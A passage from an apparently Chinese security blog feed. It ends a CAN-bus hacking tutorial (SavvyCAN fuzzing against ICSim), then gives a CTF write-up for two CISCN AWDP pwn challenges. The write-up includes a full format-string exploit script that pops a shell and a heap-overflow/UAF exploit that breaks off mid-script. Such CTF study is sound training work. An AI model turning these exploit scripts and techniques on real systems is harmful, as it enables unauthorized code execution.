class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/collin80/</span>SavvyCAN<span class="hljs-regexp">/releases/</span>download<span class="hljs-regexp">/V199.1/</span>SavvyCAN-<span class="hljs-number">305</span>dafd-x86_64.AppImage<br></code></pre></td></tr></table></figure><p>下载appimage时,无需安装,直接运行相应的可执行文件即可!</p><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs llvm">chmod <span class="hljs-number">777</span> SavvyCAN<span class="hljs-number">-305</span>dafd-<span class="hljs-keyword">x</span><span class="hljs-number">86</span>_<span class="hljs-number">64</span>.AppImage<br>./SavvyCAN<span class="hljs-number">-305</span>dafd-<span class="hljs-keyword">x</span><span class="hljs-number">86</span>_<span class="hljs-number">64</span>.AppImage<br></code></pre></td></tr></table></figure><p>运行SavvyCAN后,我们可以看到:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131029784.png" alt="image-20240813102925713"></p><p>如果我们打算将SavvyCAN与ICSim搭配使用,所以,我们还需要安装qtserialbus。</p><h2 id="安装qt5"><a href="#安装qt5" class="headerlink" title="安装qt5"></a>安装qt5</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">wget</span> https://download.qt.io/official_releases/qt/<span class="hljs-number">5</span>.<span class="hljs-number">14</span>/<span class="hljs-number">5</span>.<span class="hljs-number">14</span>.<span class="hljs-number">4</span>/qt-opensource-linux-x64-<span class="hljs-number">5</span>.<span class="hljs-number">14</span>.<span class="hljs-number">2</span>.run<br></code></pre></td></tr></table></figure><p>下载qt5后,我们需要安装/运行它,具体命令如下所示:</p><figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs applescript">chmod <span class="hljs-number">777</span> qt-opensource-linux-x64<span class="hljs-number">-5.14</span><span class="hljs-number">.2</span>.<span class="hljs-built_in">run</span><br>./qt-opensource-linux-x64<span class="hljs-number">-5.14</span><span class="hljs-number">.2</span>.<span class="hljs-built_in">run</span><br></code></pre></td></tr></table></figure><p>记下路由名称,因为后面会用到的。</p><p>一旦安装了qt5,接下来就得安装qtserialbus了,因为该软件没有包含在官方的Ubuntu存储库中,所以,我们还得自己动手,才能丰衣足食。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">$ </span><span class="language-bash">sudo apt install qtdeclarative5-dev qttools5-dev g ++</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">git <span class="hljs-built_in">clone</span> https://github.com/qt/qtserialbus</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash"><span class="hljs-built_in">cd</span> qtserialbus</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">/home/youlin/Qt5.14.2/5.14.2/gcc_64/bin/qmake .</span><br><span class="hljs-meta prompt_"></span><br><span class="hljs-meta prompt_">$ </span><span class="language-bash">make</span><br></code></pre></td></tr></table></figure><h2 id="编译SavvyCAN"><a href="#编译SavvyCAN" class="headerlink" title="编译SavvyCAN"></a>编译SavvyCAN</h2><p>为了使用qtserialbus,我们还需要通过qmake编译之前下载的SavvyCAN的AppImage文件,具体命令如下所示:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">$ git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/collin80/</span>SavvyCAN $ cd SavvyCAN $ <span class="hljs-regexp">/home/y</span>0g3sh<span class="hljs-regexp">/Qt5.14.2/</span><span class="hljs-number">5.14</span>.<span class="hljs-number">2</span><span class="hljs-regexp">/gcc_64/</span>bin/qmake CONFIG + = debug $ make<br></code></pre></td></tr></table></figure><h2 id="启动SavvyCAN"><a href="#启动SavvyCAN" class="headerlink" title="启动SavvyCAN"></a>启动SavvyCAN</h2><p>启动我们刚刚编译好的SavvyCAN,而不是我们之前下载的appimage文件。</p><p>请记住,如果您想在真正的汽车上运行它,而不是使用qtserialbus的话,则可以直接使用appimage文件,而不必费劲巴拉地编译SavvyCAN了。</p><p>这样就可以连接到我们的ICSim了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131032820.png" alt="image-20240813103225736"></p><p>savvyCAN工具部分功能与我们上面使用的can-utils工具相同,下图为RE tools中的sniffer功能,与我们上面操作使用的cansniffer功能相同,但是savvyCAN中变化的数据使用了颜色进行标记,更便于我们辨识数据。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131033148.png" alt="image-20240813103332995"></p><p>savvyCAN工具的重点即为fuzz功能,点击”Send Frames-fuzzing”就会出现下图中的fuzzing window,这个窗口中的功能适用于我们想要fuzz否个ID范围,并且可以自定义fuzz的数据。</p><p>下图中为我测试0x244 ID的fuzz效果<br><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202408131035514.png" alt="image-20240813103514377"></p>]]></content>
</entry>
<entry>
<title>ciscn_final_awdp复现</title>
<link href="/2024/07/27/ciscn-final-awdp%E5%A4%8D%E7%8E%B0/"/>
<url>/2024/07/27/ciscn-final-awdp%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="anime"><a href="#anime" class="headerlink" title="anime"></a>anime</h1><h2 id="fix"><a href="#fix" class="headerlink" title="fix"></a>fix</h2><p>程序的洞还是比较简单的,一个很明显的格式化字符串</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271704138.png" alt="image-20240727170449014"></p><p>把call printf改成call puts就行了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271707173.png" alt="image-20240727170757086"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271708798.png" alt="image-20240727170830701"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407271708809.png" alt="image-20240727170839727"></p><h2 id="break"><a href="#break" class="headerlink" title="break"></a>break</h2><p>当时比赛是断网,难点是readline里面有个aes的解密,可能很多师傅不太会写aes的加密脚本,所以当时做出来的人也不是很多</p><p>大概思路就是写出对应的aes加密脚本,然后就是常规的非栈上格式化字符串的套路,先把i改成负数,然后将返回地址改低位改成onegadget就可以getshell了</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">from</span> pwn import *<br><span class="hljs-attribute">from</span> ctypes import *<br><span class="hljs-attribute">from</span> struct import pack<br><span class="hljs-attribute">from</span> Crypto.Cipher import AES<br><span class="hljs-attribute">from</span> Crypto.Util.Padding import pad, unpad<br><span class="hljs-attribute">from</span> Crypto.Random import get_random_bytes<br><span class="hljs-attribute">from</span> base64 import b64encode,b64decode<br><span class="hljs-attribute">import</span> base64<br><span class="hljs-attribute">banary</span> = <span class="hljs-string">"./pwn"</span><br><span class="hljs-attribute">elf</span> = ELF(banary)<br><span class="hljs-attribute">libc</span> = ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br><span class="hljs-attribute">ip</span> = '<span class="hljs-number">123.57.149.79</span>'<br><span class="hljs-attribute">port</span> = <span class="hljs-number">16274</span><br><span class="hljs-attribute">local</span> = <span class="hljs-number">1</span><br><span class="hljs-attribute">if</span> local:<br> <span class="hljs-attribute">io</span> = process(banary)<br><span class="hljs-attribute">else</span>:<br> <span class="hljs-attribute">io</span> = remote(ip, port)<br><br><span class="hljs-attribute">context</span>(log_level = 'debug', os = 'linux', arch = 'amd64')<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-attribute">def</span> dbg():<br> <span class="hljs-attribute">gdb</span>.attach(io)<br> <span class="hljs-attribute">pause</span>()<br><br><span class="hljs-attribute">s</span> = lambda data : io.send(data)<br><span class="hljs-attribute">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-attribute">sa</span> = lambda text, data : io.sendafter(text, data)<br><span class="hljs-attribute">sla</span> = lambda text, data : io.sendlineafter(text, data)<br><span class="hljs-attribute">r</span> = lambda : io.recv()<br><span class="hljs-attribute">ru</span> = lambda text : io.recvuntil(text)<br><span class="hljs-attribute">uu32</span> = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, b'\x00'))<br><span class="hljs-attribute">uu64</span> = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, b<span class="hljs-string">"\x00"</span>))<br><span class="hljs-attribute">iuu32</span> = lambda : int(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br><span class="hljs-attribute">iuu64</span> = lambda : int(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br><span class="hljs-attribute">uheap</span> = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,b'\x00'))<br><span class="hljs-attribute">lg</span> = lambda data : io.success('%s -> <span class="hljs-number">0</span>x%x' % (data, eval(data)))<br><span class="hljs-attribute">ia</span> = lambda : io.interactive()<br><br><span class="hljs-attribute">def</span> encrypt(raw, key):<br> <span class="hljs-attribute">raw</span> = pad(raw,<span class="hljs-number">16</span>)<br> <span class="hljs-attribute">cipher</span> = AES.new(key, AES.MODE_ECB)<br> <span class="hljs-attribute">return</span> base64.b64encode(cipher.encrypt(raw)).decode(<span class="hljs-string">"utf-8"</span>)<br><br><span class="hljs-attribute">def</span> decrypt(enc, key):<br> <span class="hljs-attribute">enc</span> = base64.b64decode(enc)<br> <span class="hljs-attribute">cipher</span> = AES.new(key.encode('utf-<span class="hljs-number">8</span>'), AES.MODE_ECB)<br> <span class="hljs-attribute">return</span> unpad(cipher.decrypt(enc),<span class="hljs-number">16</span>)<br><br><span class="hljs-attribute">key</span>=[<span class="hljs-number">0</span>x7B,<span class="hljs-number">0</span>xF3,<span class="hljs-number">0</span>x5c,<span class="hljs-number">0</span>xd6,<span class="hljs-number">0</span>x9c,<span class="hljs-number">0</span>x47,<span class="hljs-number">0</span>x5D,<span class="hljs-number">0</span>x5E,<span class="hljs-number">0</span>x6F,<span class="hljs-number">0</span>x1D,<span class="hljs-number">0</span>x7A,<span class="hljs-number">0</span>x23,<span class="hljs-number">0</span>x18,<span class="hljs-number">0</span>x7B,<span class="hljs-number">0</span>x0F9,<span class="hljs-number">0</span>x34]<br><span class="hljs-attribute">password</span> = binascii.unhexlify('<span class="hljs-number">7</span>bf35cd69c475d5e6f1d7a23187bf934')<br><br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"linsir want to know your name\n"</span>)<br><span class="hljs-attribute">sl</span>(b'youlin')<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%<span class="hljs-number">15</span>$p%<span class="hljs-number">17</span>$p%<span class="hljs-number">19</span>$p'.ljust(<span class="hljs-number">32</span>,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">sl</span>(payload)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"0x"</span>)<br><span class="hljs-attribute">libcbase</span>=int(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)-<span class="hljs-number">0</span>x24083<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">one</span>=[<span class="hljs-number">0</span>xe3afe,<span class="hljs-number">0</span>xe3b01,<span class="hljs-number">0</span>xe3b04]<br><span class="hljs-attribute">one_gadget</span>=libcbase+one[<span class="hljs-number">1</span>]<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"one_gadget"</span>)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"0x"</span>)<br><span class="hljs-attribute">stack</span>=int(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"stack"</span>)<br><span class="hljs-attribute">ret_addr</span>=stack-<span class="hljs-number">0</span>xf0<br><span class="hljs-attribute">i_addr</span>=stack-<span class="hljs-number">0</span>x124<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"i_addr"</span>)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"0x"</span>)<br><span class="hljs-attribute">base</span>=int(io.recv(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)-<span class="hljs-number">0</span>x150f<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"base"</span>)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str(i_addr&<span class="hljs-number">0</span>xffff).encode()+b'c%<span class="hljs-number">17</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x30,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">sl</span>(payload)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str(<span class="hljs-number">0</span>xffff).encode()+b'c%<span class="hljs-number">45</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x40,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">s</span>(payload)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str(ret_addr&<span class="hljs-number">0</span>xffff).encode()+b'c%<span class="hljs-number">17</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x40,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">s</span>(payload)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str(one_gadget&<span class="hljs-number">0</span>xffff).encode()+b'c%<span class="hljs-number">45</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x40,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">s</span>(payload)<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"one_gadget"</span>)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str((ret_addr+<span class="hljs-number">2</span>)&<span class="hljs-number">0</span>xffff).encode()+b'c%<span class="hljs-number">17</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x40,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">s</span>(payload)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str((one_gadget>><span class="hljs-number">16</span>)&<span class="hljs-number">0</span>xffff).encode()+b'c%<span class="hljs-number">45</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x40,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">s</span>(payload)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str(i_addr&<span class="hljs-number">0</span>xffff).encode()+b'c%<span class="hljs-number">17</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x30,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">sl</span>(payload)<br><br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"what's your favourite anime:"</span>)<br><span class="hljs-attribute">text</span> = b'%'+str(<span class="hljs-number">1</span>).encode()+b'c%<span class="hljs-number">45</span>$hn'<br><span class="hljs-attribute">text</span> = text.ljust(<span class="hljs-number">0</span>x40,b'\x00')<br><span class="hljs-attribute">aes</span> = AES.new(password,AES.MODE_ECB)<br><span class="hljs-attribute">payload</span> = aes.encrypt(text)<br><span class="hljs-attribute">s</span>(payload)<br><br><span class="hljs-attribute">ia</span>()<br></code></pre></td></tr></table></figure><h1 id="ezheap"><a href="#ezheap" class="headerlink" title="ezheap"></a>ezheap</h1><h2 id="fix-1"><a href="#fix-1" class="headerlink" title="fix"></a>fix</h2><p>这题有点玄学,我们队最开始做的时候没有看到后面还有堆溢出,只把uaf修了就上传上去了,结果给过了???</p><p>修uaf就是把指针置零就可以了,这题还可以改段权限,check是我打awdp见过最松的了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272057322.png" alt="image-20240727205753254"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272059580.png" alt="image-20240727205947516"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202407272100307.png" alt="image-20240727210002258"></p><h2 id="break-1"><a href="#break-1" class="headerlink" title="break"></a>break</h2><p>当时做的比较慢,一直被json解析的格式难住了,直到最后才把格式写出来</p><p>有堆溢出,有uaf,直接打free_hook就行了</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><code class="hljs vim">from pwn import *<br>from ctypes import *<br>from struct import pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br>#libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br>libc=ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">''</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br>#context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'i386'</span>)<br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br><span class="hljs-keyword">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-keyword">sa</span> = lambda text, data : io.sendafter(text, data)<br><span class="hljs-keyword">sla</span> = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br><span class="hljs-keyword">ru</span> = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(<span class="hljs-keyword">b</span><span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-keyword">b</span><span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = lambda : <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'\x00'</span>))<br><span class="hljs-keyword">lg</span> = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br><span class="hljs-keyword">ia</span> = lambda : io.interactive()<br><br>def <span class="hljs-built_in">add</span>(<span class="hljs-built_in">index</span>,lenth=<span class="hljs-number">0</span>x400,content=<span class="hljs-keyword">b</span><span class="hljs-string">'youlin'</span>):<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"Please input:"</span>)<br> json=<span class="hljs-keyword">b</span><span class="hljs-string">'{"choice":"new","index":'</span>+str(<span class="hljs-built_in">index</span>).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"length":'</span>+str(lenth).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"message":"'</span>+content+<span class="hljs-keyword">b</span><span class="hljs-string">'"}'</span><br> <span class="hljs-keyword">sl</span>(json)<br><br>def <span class="hljs-keyword">delete</span>(<span class="hljs-built_in">index</span>,lenth=<span class="hljs-number">0</span>x400,content=<span class="hljs-keyword">b</span><span class="hljs-string">'youlin'</span>):<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"Please input:"</span>)<br> json=<span class="hljs-keyword">b</span><span class="hljs-string">'{"choice":"rm","index":'</span>+str(<span class="hljs-built_in">index</span>).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"length":'</span>+str(lenth).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"message":"'</span>+content+<span class="hljs-keyword">b</span><span class="hljs-string">'"}'</span><br> <span class="hljs-keyword">sl</span>(json)<br><br>def show(<span class="hljs-built_in">index</span>,lenth=<span class="hljs-number">0</span>x400,content=<span class="hljs-keyword">b</span><span class="hljs-string">'youlin'</span>):<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"Please input:"</span>)<br> json=<span class="hljs-keyword">b</span><span class="hljs-string">'{"choice":"view","index":'</span>+str(<span class="hljs-built_in">index</span>).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"length":'</span>+str(lenth).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"message":"'</span>+content+<span class="hljs-keyword">b</span><span class="hljs-string">'"}'</span><br> <span class="hljs-keyword">sl</span>(json)<br><br>def <span class="hljs-keyword">edit</span>(<span class="hljs-built_in">index</span>,content=<span class="hljs-keyword">b</span><span class="hljs-string">'youlin'</span>):<br> <span class="hljs-keyword">ru</span>(<span class="hljs-string">"Please input:"</span>)<br> json=<span class="hljs-keyword">b</span><span class="hljs-string">'{"choice":"modify","index":'</span>+str(<span class="hljs-built_in">index</span>).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"length":'</span>+str(<span class="hljs-built_in">len</span>(content)).encode()+<span class="hljs-keyword">b</span><span class="hljs-string">',"message":"'</span>+content+<span class="hljs-keyword">b</span><span class="hljs-string">'"}'</span><br> <span class="hljs-keyword">sl</span>(json)<br><br><span class="hljs-built_in">add</span>(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">1</span>)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">2</span>,<span class="hljs-number">0</span>x100)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">0</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>*<span class="hljs-number">0</span>x650+<span class="hljs-keyword">b</span><span class="hljs-string">'B'</span>*<span class="hljs-number">8</span>+<span class="hljs-keyword">b</span><span class="hljs-string">'\x71\x07'</span>)<br><br><span class="hljs-keyword">delete</span>(<span class="hljs-number">1</span>)<br><span class="hljs-built_in">add</span>(<span class="hljs-number">3</span>,<span class="hljs-number">0</span>x78,<span class="hljs-keyword">b</span><span class="hljs-string">''</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">3</span>,<span class="hljs-keyword">b</span><span class="hljs-string">'A'</span>)<br><br><br>show(<span class="hljs-number">3</span>)<br>libcbase=uu64()-<span class="hljs-number">0</span>x1ecb41<br><span class="hljs-keyword">lg</span>(<span 